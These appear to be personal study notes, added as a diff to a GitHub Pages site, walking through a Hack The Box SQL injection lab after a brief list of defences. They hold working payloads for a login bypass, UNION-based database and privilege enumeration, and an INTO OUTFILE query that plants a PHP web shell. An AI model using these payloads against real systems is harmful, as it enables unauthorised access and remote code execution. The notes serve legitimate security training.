piggydoughnut/piggydoughnut.github.io/htb/index.md

 - We should ensure that the user querying the database only has minimum permissions.
 - parametrized queries
 - web application firewall, e.g. Cloudflare

+## Task

+Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system.
+Submit the contents of the flag as your answer.
+.

+1. Login

+   SELECT \* FROM credentials where username="" AND password="";

+   AND preceeds OR.
+Hence we should try the username.

+   Try payloads: > admin' or '1'='1'#

+2. How many columnns in a given table

+   A' UNION SELECT 1,2,3,4,5-- -

+   We got 5 columns.

+3. Database information about tables

+   A' UNION SELECT 1,@@version,3,4,5-- -

+   10.3.22-MariaDB-1ubuntu1

+   Target system is Ubuntu with Maria DB.

+4. Which user has write access -> user_privileges

+   Who is the current user ?

+   `cn' UNION SELECT 1, user(), 3, 4, 5-- -` - root@localhost

+   Test if we have super admin privileges

+   `cn' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -` Y

+   Which privileges does the user have

+   `cn' UNION SELECT 1, grantee, privilege_type, 4, 5 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'" -- -` ALL

+5. Write a file

+   `cn' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -`

+   Value is empty, so write anything anywhere.

+   `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell.php'-- -`